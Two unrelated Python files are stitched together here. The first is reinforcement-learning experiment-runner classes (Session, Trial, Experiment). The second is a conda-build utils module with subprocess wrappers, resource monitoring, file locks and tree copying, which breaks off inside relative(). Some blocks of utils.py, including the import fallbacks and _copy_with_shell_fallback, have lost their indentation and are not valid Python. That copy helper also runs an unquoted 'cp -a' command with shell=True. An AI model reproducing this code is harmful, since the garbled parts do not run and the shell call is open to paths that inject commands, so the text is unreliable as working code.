            for body in agent.nanflat_body_a:
                env = body.env
                super(SpaceSession, self).try_ckpt(agent, env)

    def run_all_episodes(self):
        '''
        Continually run all episodes, where each env can step and reset at its own clock_speed and timeline.
        Will terminate when all envs done are done.
        '''
        all_done = self.aeb_space.tick('epi')
        reward_space, state_space, done_space = self.env_space.reset()
        self.agent_space.reset(state_space)
        while not all_done:
            self.try_ckpt(self.agent_space, self.env_space)
            all_done = self.aeb_space.tick()
            action_space = self.agent_space.act(state_space)
            reward_space, state_space, done_space = self.env_space.step(action_space)
            self.agent_space.update(action_space, reward_space, state_space, done_space)
        self.try_ckpt(self.agent_space, self.env_space)
        if self.eval_proc is not None:  # wait for final eval before closing
            util.run_cmd_wait(self.eval_proc)

    def close(self):
        '''
        Close session and clean up.
        Save agent, close env.
        '''
        self.agent_space.close()
        self.env_space.close()
        logger.info('Session done and closed.')

    def run(self):
        self.run_all_episodes()
        self.data = analysis.analyze_session(self)  # session fitness
        self.close()
        return self.data
def init_run_session(*args):
    '''Runner for multiprocessing'''
    return Session(*args).run()
def init_run_space_session(*args):
    '''Runner for multiprocessing'''
    return SpaceSession(*args).run()
class Trial:
    '''
    The base unit of an experiment.
    Given a spec and number s,
    trial creates and runs s sessions,
    gather and aggregate data from sessions as trial data,
    then return the trial data.
    '''

    def __init__(self, spec, info_space):
        self.spec = spec
        self.info_space = info_space
        self.index = self.info_space.get('trial')
        info_space.set('session', None)  # Session starts anew for new trial
        util.set_logger(self.spec, self.info_space, logger, 'trial')
        self.session_data_dict = {}
        self.data = None

        analysis.save_spec(spec, info_space, unit='trial')
        self.is_singleton = spec_util.is_singleton(spec)  # singleton mode as opposed to multi-agent-env space
        # pick session class and multiprocessing runner to match the mode
        self.SessionClass = Session if self.is_singleton else SpaceSession
        self.mp_runner = init_run_session if self.is_singleton else init_run_space_session
        logger.info(f'Initialized trial {self.index}')

    def parallelize_sessions(self, global_nets=None):
        # fork one process per session; each gets deep copies so they don't share state
        workers = []
        for _s in range(self.spec['meta']['max_session']):
            self.info_space.tick('session')
            w = mp.Process(target=self.mp_runner, args=(deepcopy(self.spec), deepcopy(self.info_space), global_nets))
            w.start()
            workers.append(w)
        for w in workers:
            w.join()
        # session data is read back from disk, not returned by the processes
        session_datas = analysis.session_data_dict_for_dist(self.spec, self.info_space)
        return session_datas

    def run_sessions(self):
        logger.info('Running sessions')
        if util.get_lab_mode() in ('train', 'eval') and self.spec['meta']['max_session'] > 1:
            # when training a single spec over multiple sessions
            session_datas = self.parallelize_sessions()
        else:
            # serial fallback; stops early when a session is deemed unfit
            session_datas = []
            for _s in range(self.spec['meta']['max_session']):
                self.info_space.tick('session')
                session = self.SessionClass(deepcopy(self.spec), deepcopy(self.info_space))
                session_data = session.run()
                session_datas.append(session_data)
                if analysis.is_unfit(session_data, session):
                    break
        return session_datas

    def make_global_nets(self, agent):
        # expose the agent's networks via shared memory for distributed sessions
        global_nets = {}
        for net_name in agent.algorithm.net_names:
            g_net = getattr(agent.algorithm, net_name)
            g_net.share_memory()  # make net global
            # TODO also create shared optimizer here
            global_nets[net_name] = g_net
        return global_nets

    def init_global_nets(self):
        # build a throwaway session just to construct nets, then close its env(s)
        session = self.SessionClass(deepcopy(self.spec), deepcopy(self.info_space))
        if self.is_singleton:
            session.env.close()  # safety
            global_nets = self.make_global_nets(session.agent)
        else:
            session.env_space.close()  # safety
            global_nets = [self.make_global_nets(agent) for agent in session.agent_space.agents]
        return global_nets

    def run_distributed_sessions(self):
        logger.info('Running distributed sessions')
        global_nets = self.init_global_nets()
        session_datas = self.parallelize_sessions(global_nets)
        return session_datas

    def close(self):
        logger.info('Trial done and closed.')

    def run(self):
        if self.spec['meta'].get('distributed'):
            session_datas = self.run_distributed_sessions()
        else:
            session_datas = self.run_sessions()
        self.session_data_dict = {data.index[0]: data for data in session_datas}
        self.data = analysis.analyze_trial(self)
        self.close()
        return self.data
class Experiment:
    '''
    The core high level unit of Lab.
    Given a spec-space/generator of cardinality t,
    a number s,
    a hyper-optimization algorithm hopt(spec, fitness-metric) -> spec_next/null
    experiment creates and runs up to t trials of s sessions each to optimize (maximize) the fitness metric,
    gather the trial data,
    then return the experiment data for analysis and use in evolution graph.
    Experiment data will include the trial data, notes on design, hypothesis, conclusion, analysis data, e.g. fitness metric, evolution link of ancestors to potential descendants.
    An experiment then forms a node containing its data in the evolution graph with the evolution link and suggestion at the adjacent possible new experiments
    On the evolution graph level, an experiment and its neighbors could be seen as test/development of traits.
    '''

    def __init__(self, spec, info_space):
        self.spec = spec
        self.info_space = info_space
        self.index = self.info_space.get('experiment')
        util.set_logger(self.spec, self.info_space, logger, 'trial')
        self.trial_data_dict = {}
        self.data = None
        analysis.save_spec(spec, info_space, unit='experiment')
        # resolve the hyper-parameter search class named in the spec
        SearchClass = getattr(search, spec['meta'].get('search'))
        self.search = SearchClass(self)
        logger.info(f'Initialized experiment {self.index}')

    def init_trial_and_run(self, spec, info_space):
        '''
        Method to run trial with the properly updated info_space (trial_index) from experiment.search.lab_trial.
        '''
        trial = Trial(spec, info_space)
        trial_data = trial.run()
        return trial_data

    def close(self):
        reload(search)  # fixes ray consecutive run crashing due to bad cleanup
        logger.info('Experiment done and closed.')

    def run(self):
        # the search object drives trial creation via init_trial_and_run
        self.trial_data_dict = self.search.run()
        self.data = analysis.analyze_experiment(self)
        self.close()
        return self.data
|
utils.py | from __future__ import absolute_import, division, print_function
from collections import OrderedDict, defaultdict
import contextlib
import fnmatch
import hashlib
import json
from locale import getpreferredencoding
import libarchive
import logging
import logging.config
import mmap
import operator
import os
from os.path import (dirname, getmtime, getsize, isdir, join, isfile, abspath, islink,
expanduser, expandvars)
import re
import stat
import subprocess
import sys
import shutil
import tarfile
import tempfile
from threading import Thread
import time
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
import yaml
import filelock
import conda_package_handling.api
try:
from conda.base.constants import CONDA_TARBALL_EXTENSIONS
except Exception:
from conda.base.constants import CONDA_TARBALL_EXTENSION
CONDA_TARBALL_EXTENSIONS = (CONDA_TARBALL_EXTENSION,)
from conda.api import PackageCacheData
from .conda_interface import hashsum_file, md5_file, unix_path_to_win, win_path_to_unix
from .conda_interface import PY3, iteritems
from .conda_interface import root_dir, pkgs_dirs
from .conda_interface import string_types
from .conda_interface import memoized
from .conda_interface import StringIO
from .conda_interface import VersionOrder, MatchSpec
from .conda_interface import cc_conda_build
from .conda_interface import conda_43, conda_46, Dist
from .conda_interface import context
from .conda_interface import download, TemporaryDirectory, get_conda_channel, CondaHTTPError
# NOQA because it is not used in this file.
from conda_build.conda_interface import rm_rf as _rm_rf # NOQA
from conda_build.exceptions import BuildLockError
from conda_build.os_utils import external
# Python 2/3 compatibility shims: pick a glob implementation, urllib layout,
# ExitStack source, and exception aliases appropriate to the interpreter.
if PY3:
    from glob import glob as glob_glob

    # stdlib glob is less feature-rich but considerably faster than glob2
    def glob(pathname, recursive=True):
        """Recursive glob wrapper with a py2-compatible signature."""
        return glob_glob(pathname, recursive=recursive)

    import urllib.parse as urlparse
    import urllib.request as urllib
    # NOQA because it is not used in this file.
    from contextlib import ExitStack  # NOQA
    PermissionError = PermissionError  # NOQA
    FileNotFoundError = FileNotFoundError
else:
    from glob2 import glob as glob2_glob

    def glob(pathname, recursive=True):
        """Recursive glob wrapper backed by glob2 on Python 2."""
        return glob2_glob(pathname, recursive=recursive)

    import urlparse
    import urllib
    # NOQA because it is not used in this file.
    from contextlib2 import ExitStack  # NOQA
    # Python 2 has no PermissionError/FileNotFoundError; approximate with OSError.
    PermissionError = OSError
    FileNotFoundError = OSError
# True when running on Windows; gates all win32-specific behavior below.
# (The original assigned on_win twice in a row; the duplicate is removed.)
on_win = (sys.platform == 'win32')
# Preferred text codec for encoding/decoding subprocess arguments and paths.
codec = getpreferredencoding() or 'utf-8'
root_script_dir = os.path.join(root_dir, 'Scripts' if on_win else 'bin')
# mmap constants are POSIX-only; substitute harmless zeros on Windows.
mmap_MAP_PRIVATE = 0 if on_win else mmap.MAP_PRIVATE
mmap_PROT_READ = 0 if on_win else mmap.PROT_READ
mmap_PROT_WRITE = 0 if on_win else mmap.PROT_WRITE

# Platform subdirectory names recognized in a conda channel layout.
DEFAULT_SUBDIRS = {
    "linux-64",
    "linux-32",
    "linux-ppc64le",
    "linux-armv6l",
    "linux-armv7l",
    "linux-aarch64",
    "win-64",
    "win-32",
    "osx-64",
    "zos-z",
    "noarch",
}

# Template for generated entry-point scripts (filled via %-formatting with
# 'module', 'import_name' and 'func' keys in create_entry_point).
PY_TMPL = """
# -*- coding: utf-8 -*-
import re
import sys
from %(module)s import %(import_name)s
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(%(func)s())
"""

# os.scandir/os.walk are stdlib from 3.5; fall back to the scandir backport.
try:
    from os import scandir, walk  # NOQA
except ImportError:
    from scandir import walk
# Cached os.stat: directory_size_slow can hit the same path repeatedly, so
# memoizing avoids redundant syscalls.  NOTE(review): the cache is never
# invalidated, so results go stale if files change while the process runs.
@memoized
def stat_file(path):
    return os.stat(path)
def directory_size_slow(path):
    """Pure-Python disk-usage fallback: sum file sizes under *path*.

    Counts each inode only once so hard-linked files are not double-counted;
    unreadable files are skipped.  Used when the external du/dir command in
    directory_size fails.
    """
    seen_inodes = set()
    total = 0
    for root, _dirs, filenames in walk(path):
        for name in filenames:
            try:
                info = stat_file(os.path.join(root, name))
            except OSError:
                continue
            if info.st_ino not in seen_inodes:
                seen_inodes.add(info.st_ino)
                total += info.st_size
    return total
def directory_size(path):
    """Return the reported size of the directory tree at *path*.

    Shells out to ``dir /s`` on Windows or ``du -s`` on POSIX for speed, and
    falls back to the pure-Python :func:`directory_size_slow` walk when the
    external command fails.  Returns 0 when the output cannot be parsed.
    NOTE(review): ``du -s`` reports 1K blocks, not bytes — kept as-is since
    callers only use this for relative build statistics; confirm if exact
    byte counts are ever required.
    """
    try:
        if on_win:
            command = 'dir /s "{}"'  # Windows path can have spaces
            out = subprocess.check_output(command.format(path), shell=True)
        else:
            # Pass an argument list (the original used .split(), which broke
            # on paths containing spaces).
            out = subprocess.check_output(["du", "-s", path], stderr=subprocess.PIPE)
        if hasattr(out, 'decode'):
            try:
                out = out.decode(errors='ignore')
            # This isn't important anyway so give up. Don't try search on bytes.
            except (UnicodeDecodeError, IndexError):
                if on_win:
                    return 0
                else:
                    pass
        if on_win:
            # Windows can give long output, we need only 2nd to last line
            out = out.strip().rsplit('\r\n', 2)[-2]
            # raw string (the original non-raw "\s..." emits a
            # DeprecationWarning on modern Python)
            pattern = r"\s([\d\W]+).+"  # Language and punctuation neutral
            out = re.search(pattern, out.strip()).group(1).strip()
            out = out.replace(',', '').replace('.', '').replace(' ', '')
        else:
            out = out.split()[0]
    except subprocess.CalledProcessError:
        out = directory_size_slow(path)
    try:
        return int(out)  # size in bytes
    except ValueError:
        return 0
class DummyPsutilProcess(object):
    """Minimal stand-in for ``psutil.Process`` when psutil is unavailable.

    PopenWrapper only needs ``children``; without psutil we cannot enumerate
    child processes, so report none.
    """

    def children(self, *args, **kwargs):
        """Return an empty list regardless of arguments."""
        return []
def _setup_rewrite_pipe(env):
    """Rewrite values of env variables back to $ENV in stdout

    Takes output on the pipe and finds any env value
    and rewrites it as the env key

    Useful for replacing "~/conda/conda-bld/pkg_<date>/_h_place..." with "$PREFIX"

    Returns an FD to be passed to Popen(stdout=...)
    """
    # replacements is the env dict reversed,
    # ordered by the length of the value so that longer replacements
    # always occur first in case of common prefixes
    replacements = OrderedDict()
    for k, v in sorted(env.items(), key=lambda kv: len(kv[1]), reverse=True):
        replacements[v] = k

    r_fd, w_fd = os.pipe()
    r = os.fdopen(r_fd, 'rt')
    if sys.platform == 'win32':
        replacement_t = '%{}%'
    else:
        replacement_t = '${}'

    def rewriter():
        # Daemon-thread body: stream lines from the read end, substituting
        # env values with their variable names, until the pipe is closed.
        while True:
            try:
                line = r.readline()
                if not line:
                    # reading done
                    r.close()
                    os.close(w_fd)
                    return
                for s, key in replacements.items():
                    line = line.replace(s, replacement_t.format(key))
                sys.stdout.write(line)
            except UnicodeDecodeError:
                # Undecodable output: drain raw bytes so the writer does not
                # block.  Fix: os.read() requires a file descriptor — the
                # original passed the file object `r` (always raising
                # TypeError) — and the bytes must be decoded before writing
                # to the text-mode stdout.
                try:
                    raw = os.read(r_fd, 10000)
                    sys.stdout.write(raw.decode(errors='ignore') if raw else '')
                except (OSError, TypeError):
                    pass

    t = Thread(target=rewriter)
    t.daemon = True
    t.start()

    return w_fd
class PopenWrapper(object):
    """Run a subprocess while polling its resource usage.

    Peak statistics are exposed as attributes after construction: ``rss``,
    ``vms``, ``cpu_sys``, ``cpu_user``, ``processes``, ``disk``, ``elapsed``
    and ``returncode``.  Memory/CPU figures require psutil; without it only
    disk usage and elapsed time are collected.
    """
    # Small wrapper around subprocess.Popen to allow memory usage monitoring
    # copied from ProtoCI, https://github.com/ContinuumIO/ProtoCI/blob/59159bc2c9f991fbfa5e398b6bb066d7417583ec/protoci/build2.py#L20 # NOQA

    def __init__(self, *args, **kwargs):
        self.elapsed = None
        self.rss = 0
        self.vms = 0
        # Initialize CPU counters so __repr__ is safe even if monitoring
        # finishes before the first polling pass sets them.
        self.cpu_sys = 0
        self.cpu_user = 0
        self.returncode = None
        self.disk = 0
        self.processes = 1
        self.out, self.err = self._execute(*args, **kwargs)

    def _execute(self, *args, **kwargs):
        try:
            import psutil
            # de-duplicated: the original listed psutil.NoSuchProcess twice
            psutil_exceptions = (psutil.NoSuchProcess, psutil.AccessDenied)
        except ImportError as e:
            psutil = None
            psutil_exceptions = (OSError, ValueError)
            log = get_logger(__name__)
            log.warn("psutil import failed. Error was {}".format(e))
            log.warn("only disk usage and time statistics will be available. Install psutil to "
                     "get CPU time and memory usage statistics.")

        # The polling interval (in seconds)
        time_int = kwargs.pop('time_int', 2)

        disk_usage_dir = kwargs.get('cwd', sys.prefix)

        # Create a process of this (the parent) process
        parent = psutil.Process(os.getpid()) if psutil else DummyPsutilProcess()

        cpu_usage = defaultdict(dict)

        # Using the convenience Popen class provided by psutil
        start_time = time.time()
        _popen = psutil.Popen(*args, **kwargs) if psutil else subprocess.Popen(*args, **kwargs)
        try:
            while self.returncode is None:
                # We need to get all of the children of our process since our
                # process spawns other processes.  Collect all of the child
                # processes
                rss = 0
                vms = 0
                processes = 0
                # We use the parent process to get mem usage of all spawned processes
                for child in parent.children(recursive=True):
                    child_cpu_usage = cpu_usage.get(child.pid, {})
                    try:
                        mem = child.memory_info()
                        rss += mem.rss
                        # fix: accumulate virtual memory from mem.vms
                        # (the original mistakenly added mem.rss here)
                        vms += mem.vms
                        # listing child times are only available on linux, so we don't use them.
                        # we are instead looping over children and getting each individually.
                        # https://psutil.readthedocs.io/en/latest/#psutil.Process.cpu_times
                        cpu_stats = child.cpu_times()
                        child_cpu_usage['sys'] = cpu_stats.system
                        child_cpu_usage['user'] = cpu_stats.user
                        cpu_usage[child.pid] = child_cpu_usage
                    except psutil_exceptions:
                        # process already died. Just ignore it.
                        continue
                    processes += 1

                # Track peaks across the polling passes.
                self.rss = max(rss, self.rss)
                self.vms = max(vms, self.vms)
                self.cpu_sys = sum(child['sys'] for child in cpu_usage.values())
                self.cpu_user = sum(child['user'] for child in cpu_usage.values())
                self.processes = max(processes, self.processes)

                # Get disk usage
                self.disk = max(directory_size(disk_usage_dir), self.disk)

                time.sleep(time_int)
                self.elapsed = time.time() - start_time
                self.returncode = _popen.poll()
        except KeyboardInterrupt:
            _popen.kill()
            raise

        # Final measurements after the child exits.
        self.disk = max(directory_size(disk_usage_dir), self.disk)
        self.elapsed = time.time() - start_time
        return _popen.stdout, _popen.stderr

    def __repr__(self):
        return str({'elapsed': self.elapsed,
                    'rss': self.rss,
                    'vms': self.vms,
                    'disk': self.disk,
                    'processes': self.processes,
                    'cpu_user': self.cpu_user,
                    'cpu_sys': self.cpu_sys,
                    'returncode': self.returncode})
def _func_defaulting_env_to_os_environ(func, *popenargs, **kwargs):
    """Shared driver for check_call_env / check_output_env.

    *func* is 'call' or 'output'.  Ensures kwargs['env'] defaults to a copy
    of os.environ with all keys/values coerced to str, coerces each popenarg
    to the native str type, and honors two extra kwargs:

    - 'stats': a dict that, when given, is filled with resource-usage
      statistics gathered by PopenWrapper.
    - 'rewrite_stdout_env': env dict whose values are rewritten back to
      $VARNAME in the child's stdout (see _setup_rewrite_pipe).

    Returns the captured output for 'output' (when not using stats, via
    subprocess.check_output), else None.  Raises CalledProcessError on
    non-zero exit.
    """
    if 'env' not in kwargs:
        kwargs = kwargs.copy()
        env_copy = os.environ.copy()
        kwargs.update({'env': env_copy})
    # subprocess environments must be str->str; drop any non-string values.
    kwargs['env'] = {str(key): str(value) for key, value in kwargs['env'].items()}
    _args = []
    if 'stdin' not in kwargs:
        kwargs['stdin'] = subprocess.PIPE
    for arg in popenargs:
        # arguments to subprocess need to be bytestrings
        if sys.version_info.major < 3 and hasattr(arg, 'encode'):
            arg = arg.encode(codec)
        elif sys.version_info.major >= 3 and hasattr(arg, 'decode'):
            arg = arg.decode(codec)
        _args.append(str(arg))
    stats = kwargs.get('stats')
    if 'stats' in kwargs:
        del kwargs['stats']
    rewrite_stdout_env = kwargs.pop('rewrite_stdout_env', None)
    if rewrite_stdout_env:
        kwargs['stdout'] = _setup_rewrite_pipe(rewrite_stdout_env)
    out = None
    if stats is not None:
        # Resource-monitored execution path.
        proc = PopenWrapper(_args, **kwargs)
        if func == 'output':
            out = proc.out.read()
        if proc.returncode != 0:
            raise subprocess.CalledProcessError(proc.returncode, _args)
        stats.update({'elapsed': proc.elapsed,
                      'disk': proc.disk,
                      'processes': proc.processes,
                      'cpu_user': proc.cpu_user,
                      'cpu_sys': proc.cpu_sys,
                      'rss': proc.rss,
                      'vms': proc.vms})
    else:
        if func == 'call':
            subprocess.check_call(_args, **kwargs)
        else:
            # check_output manages stdout itself; a caller-supplied stdout
            # would make it raise, so drop it.
            if 'stdout' in kwargs:
                del kwargs['stdout']
            out = subprocess.check_output(_args, **kwargs)
    return out
def check_call_env(popenargs, **kwargs):
    """subprocess.check_call variant that defaults env to a stringified
    os.environ and supports the extra 'stats' / 'rewrite_stdout_env' kwargs
    (see _func_defaulting_env_to_os_environ)."""
    return _func_defaulting_env_to_os_environ('call', *popenargs, **kwargs)
def check_output_env(popenargs, **kwargs):
    """subprocess.check_output variant that defaults env to a stringified
    os.environ; returns the output with trailing whitespace stripped."""
    return _func_defaulting_env_to_os_environ('output', stdout=subprocess.PIPE,
                                              *popenargs, **kwargs).rstrip()
def bytes2human(n):
    """Format a byte count using binary (1024-based) unit suffixes.

    >>> bytes2human(10000)    # doctest: +SKIP
    '9.8K'
    >>> bytes2human(100001221)    # doctest: +SKIP
    '95.4M'

    Values below 1024 are returned as '<n>B'.
    (From http://code.activestate.com/recipes/578019)
    """
    units = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
    # Walk from the largest unit down; each unit is 1024**(index+1) bytes.
    for exponent in range(len(units) - 1, -1, -1):
        threshold = 1 << ((exponent + 1) * 10)
        if n >= threshold:
            return '%.1f%s' % (float(n) / threshold, units[exponent])
    return "%sB" % n
def get_recipe_abspath(recipe):
    """resolve recipe dir as absolute path. If recipe is a tarball rather than a folder,
    extract it and return the extracted directory.
    Returns the absolute path, and a boolean flag that is true if a tarball has been extracted
    and needs cleanup.
    """
    if not PY3:
        # Don't use byte literals for paths in Python 2
        recipe = recipe.decode(getpreferredencoding() or 'utf-8')
    if not isfile(recipe):
        # A directory (or nonexistent path): resolve relative to cwd.
        recipe_dir = abspath(os.path.join(os.getcwd(), recipe))
        need_cleanup = False
    elif recipe.lower().endswith(decompressible_exts) or recipe.lower().endswith(CONDA_TARBALL_EXTENSIONS):
        # A recognized archive: unpack it into a temp dir the caller must clean up.
        recipe_dir = tempfile.mkdtemp()
        tar_xf(recipe, recipe_dir)
        # At some stage the old build system started to tar up recipes.
        recipe_tarfile = os.path.join(recipe_dir, 'info', 'recipe.tar')
        if isfile(recipe_tarfile):
            tar_xf(recipe_tarfile, os.path.join(recipe_dir, 'info'))
        need_cleanup = True
    else:
        print("Ignoring non-recipe: %s" % recipe)
        return (None, None)
    if not os.path.exists(recipe_dir):
        raise ValueError("Package or recipe at path {0} does not exist".format(recipe_dir))
    return recipe_dir, need_cleanup
@contextlib.contextmanager
def try_acquire_locks(locks, timeout):
    """Try to acquire all locks.

    If any lock can't be immediately acquired, free all locks.
    If the timeout is reached without acquiring all locks, free all locks and raise.

    All-or-nothing acquisition avoids deadlock when multiple processes grab
    overlapping lock sets in different orders:
    http://stackoverflow.com/questions/9814008/multiple-mutex-locking-strategies-and-why-libraries-dont-use-address-comparison
    """
    t = time.time()
    while (time.time() - t < timeout):
        # Continuously try to acquire all locks.
        # By passing a short timeout to each individual lock, we give other
        # processes that might be trying to acquire the same locks (and may
        # already hold some of them) a chance to the remaining locks - and
        # hopefully subsequently release them.
        try:
            for lock in locks:
                lock.acquire(timeout=0.1)
        except filelock.Timeout:
            # If we failed to acquire a lock, it is important to release all
            # locks we may have already acquired, to avoid wedging multiple
            # processes that try to acquire the same set of locks.
            # That is, we want to avoid a situation where processes 1 and 2 try
            # to acquire locks A and B, and proc 1 holds lock A while proc 2
            # holds lock B.
            for lock in locks:
                lock.release()
        else:
            # All locks acquired; stop retrying.
            break
    else:
        # If we reach this point, we weren't able to acquire all locks within
        # the specified timeout. We shouldn't be holding any locks anymore at
        # this point, so we just raise an exception.
        raise BuildLockError('Failed to acquire all locks')
    try:
        yield
    finally:
        # Always release every lock, even if the body raised.
        for lock in locks:
            lock.release()
# with each of these, we are copying less metadata. This seems to be necessary
# to cope with some shared filesystems with some virtual machine setups.
# See https://github.com/conda/conda-build/issues/1426
def _copy_with_shell_fallback(src, dst):
is_copied = False
for func in (shutil.copy2, shutil.copy, shutil.copyfile):
try:
func(src, dst)
is_copied = True
break
except (IOError, OSError, PermissionError):
continue
if not is_copied:
try:
subprocess.check_call('cp -a {} {}'.format(src, dst), shell=True,
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
except subprocess.CalledProcessError as e:
if not os.path.isfile(dst):
raise OSError("Failed to copy {} to {}. Error was: {}".format(src, dst, e))
def get_prefix_replacement_paths(src, dst):
    """Strip the shared trailing path components from *src* and *dst*.

    Used when relinking symlinks: returns the two distinct "prefix" parts of
    the paths, i.e. each path with the common suffix removed.
    """
    src_parts = src.split(os.path.sep)
    dst_parts = dst.split(os.path.sep)
    # Pop matching components off the tail of both paths.
    while src_parts and src_parts[-1] == dst_parts[-1]:
        src_parts.pop()
        dst_parts.pop()
    return os.path.join(*src_parts), os.path.join(*dst_parts)
def copy_into(src, dst, timeout=900, symlinks=False, lock=None, locking=True, clobber=False):
    """Copy all the files and directories in src to the directory dst.

    - symlink + symlinks=True: the link is recreated at dst with its target
      rewritten from the src prefix to the dst prefix.
    - directory: delegated to merge_tree.
    - file: copied under a per-folder lock (unless locking=False).
    """
    log = get_logger(__name__)
    if symlinks and islink(src):
        try:
            os.makedirs(os.path.dirname(dst))
        except OSError:
            pass
        if os.path.lexists(dst):
            os.remove(dst)
        # Rewrite the link target so it points inside dst's tree rather
        # than back into src's tree.
        src_base, dst_base = get_prefix_replacement_paths(src, dst)
        src_target = os.readlink(src)
        src_replaced = src_target.replace(src_base, dst_base)
        os.symlink(src_replaced, dst)
        try:
            st = os.lstat(src)
            mode = stat.S_IMODE(st.st_mode)
            os.lchmod(dst, mode)
        except:
            pass  # lchmod not available
    elif isdir(src):
        merge_tree(src, dst, symlinks, timeout=timeout, lock=lock, locking=locking, clobber=clobber)
    else:
        if isdir(dst):
            dst_fn = os.path.join(dst, os.path.basename(src))
        else:
            dst_fn = dst
        # Determine which folder the lock should key on.
        if os.path.isabs(src):
            src_folder = os.path.dirname(src)
        else:
            if os.path.sep in dst_fn:
                src_folder = os.path.dirname(dst_fn)
                if not os.path.isdir(src_folder):
                    os.makedirs(src_folder)
            else:
                src_folder = os.getcwd()
        if os.path.islink(src) and not os.path.exists(os.path.realpath(src)):
            log.warn('path %s is a broken symlink - ignoring copy', src)
            return
        if not lock and locking:
            lock = get_lock(src_folder, timeout=timeout)
        locks = [lock] if locking else []
        with try_acquire_locks(locks, timeout):
            # create intermediate folders if they do not exist yet
            dst_folder = os.path.dirname(dst)
            if dst_folder and not os.path.exists(dst_folder):
                try:
                    os.makedirs(dst_folder)
                except OSError:
                    pass
            try:
                _copy_with_shell_fallback(src, dst_fn)
            except shutil.Error:
                log.debug("skipping %s - already exists in %s",
                          os.path.basename(src), dst)
def move_with_fallback(src, dst):
    """Move *src* to *dst*; on PermissionError fall back to copy-then-unlink.

    If even the cleanup unlink is not permitted, the leftover source is
    logged at debug level and otherwise ignored (best effort).
    """
    try:
        shutil.move(src, dst)
    except PermissionError:
        copy_into(src, dst)
        try:
            os.unlink(src)
        except PermissionError:
            get_logger(__name__).debug(
                "Failed to clean up temp path due to permission error: %s" % src)
# http://stackoverflow.com/a/22331852/1170370
def copytree(src, dst, symlinks=False, ignore=None, dry_run=False):
    """Recursively copy *src* into *dst* and return the list of top-level
    destination paths that were (or would be) created.

    With dry_run=True nothing is copied — only the destination paths are
    computed (merge_tree uses this to detect conflicts).  '.conda_lock'
    files are never copied.  Based on http://stackoverflow.com/a/22331852/1170370
    """
    if not os.path.exists(dst):
        os.makedirs(dst)
        shutil.copystat(src, dst)
    lst = os.listdir(src)
    if ignore:
        excl = ignore(src, lst)
        lst = [x for x in lst if x not in excl]
    # do not copy lock files
    if '.conda_lock' in lst:
        lst.remove('.conda_lock')
    dst_lst = [os.path.join(dst, item) for item in lst]
    if not dry_run:
        for idx, item in enumerate(lst):
            s = os.path.join(src, item)
            d = dst_lst[idx]
            if symlinks and os.path.islink(s):
                if os.path.lexists(d):
                    os.remove(d)
                os.symlink(os.readlink(s), d)
                try:
                    st = os.lstat(s)
                    mode = stat.S_IMODE(st.st_mode)
                    os.lchmod(d, mode)
                except:
                    pass  # lchmod not available
            elif os.path.isdir(s):
                # NOTE(review): dry_run is not propagated here, so a dry run
                # only previews the top level of the tree — confirm intended.
                copytree(s, d, symlinks, ignore)
            else:
                _copy_with_shell_fallback(s, d)
    return dst_lst
def merge_tree(src, dst, symlinks=False, timeout=900, lock=None, locking=True, clobber=False):
    """
    Merge src into dst recursively by copying all files from src into dst.
    Return a list of all files copied.
    Like copytree(src, dst), but raises an error if merging the two trees
    would overwrite any files.
    """
    dst = os.path.normpath(os.path.normcase(dst))
    src = os.path.normpath(os.path.normcase(src))
    assert not dst.startswith(src), ("Can't merge/copy source into subdirectory of itself. "
                                     "Please create separate spaces for these things.\n"
                                     " src: {0}\n"
                                     " dst: {1}".format(src, dst))

    # Dry-run pass: compute destination paths and refuse to clobber.
    would_copy = copytree(src, dst, symlinks=symlinks, dry_run=True)
    conflicts = [path for path in would_copy if isfile(path)]
    if conflicts and not clobber:
        raise IOError("Can't merge {0} into {1}: file exists: "
                      "{2}".format(src, dst, conflicts[0]))

    locks = []
    if locking:
        locks = [lock if lock else get_lock(src, timeout=timeout)]
    with try_acquire_locks(locks, timeout):
        copytree(src, dst, symlinks=symlinks)
# purpose here is that we want *one* lock per location on disk. It can be locked or unlocked
# at any time, but the lock within this process should all be tied to the same tracking
# mechanism.
# Candidate directories that hold the lock files: a system-wide location
# under the conda root, then a per-user fallback.
_lock_folders = (os.path.join(root_dir, 'locks'),
                 os.path.expanduser(os.path.join('~', '.conda_build_locks')))


def get_lock(folder, timeout=900):
    """Return a filelock.FileLock uniquely keyed to *folder*.

    The lock file lives in the first writable entry of _lock_folders and is
    named with the sha256 of the folder's absolute path, so every process
    locking the same on-disk location shares one lock file.  Raises
    RuntimeError if neither lock directory is writable.
    """
    fl = None
    try:
        location = os.path.abspath(os.path.normpath(folder))
    except OSError:
        # e.g. cwd no longer exists; fall back to the name as given.
        location = folder
    b_location = location
    if hasattr(b_location, 'encode'):
        b_location = b_location.encode()
    # Hash the entire filename to avoid collisions.
    lock_filename = hashlib.sha256(b_location).hexdigest()
    if hasattr(lock_filename, 'decode'):
        lock_filename = lock_filename.decode()
    for locks_dir in _lock_folders:
        try:
            if not os.path.isdir(locks_dir):
                os.makedirs(locks_dir)
            lock_file = os.path.join(locks_dir, lock_filename)
            # Touch the file to verify writability before handing out a lock.
            with open(lock_file, 'w') as f:
                f.write("")
            fl = filelock.FileLock(lock_file, timeout)
            break
        except (OSError, IOError):
            continue
    else:
        # for/else: no candidate directory was writable.
        raise RuntimeError("Could not write locks folder to either system location ({0})"
                           "or user location ({1}). Aborting.".format(*_lock_folders))
    return fl
def get_conda_operation_locks(locking=True, bldpkgs_dirs=None, timeout=900):
    """Return the list of locks guarding conda package operations.

    Covers the first package cache dir, every build-packages dir given, and
    one generic 'conda-operation' lock.  Empty list when locking is off.
    """
    if not locking:
        return []
    acquired = []
    folders = pkgs_dirs[:1] + list(ensure_list(bldpkgs_dirs))
    for folder in folders:
        if not os.path.isdir(folder):
            os.makedirs(folder)
        acquired.append(get_lock(folder, timeout=timeout))
    # lock used to generally indicate a conda operation occurring
    acquired.append(get_lock('conda-operation', timeout=timeout))
    return acquired
def relative(f, d='lib'):
    """Return the relative path from the directory containing *f* to
    directory *d*, both given relative to a common (prefix) root.

    Uses '/' separators regardless of platform.  '.' for *d* means the
    root itself.
    """
    assert not f.startswith('/'), f
    assert not d.startswith('/'), d
    d_parts = d.strip('/').split('/')
    if d_parts == ['.']:
        d_parts = []
    f_parts = dirname(f).split('/')
    if f_parts == ['']:
        f_parts = []
    # Drop the shared leading components.
    common = 0
    for a, b in zip(d_parts, f_parts):
        if a != b:
            break
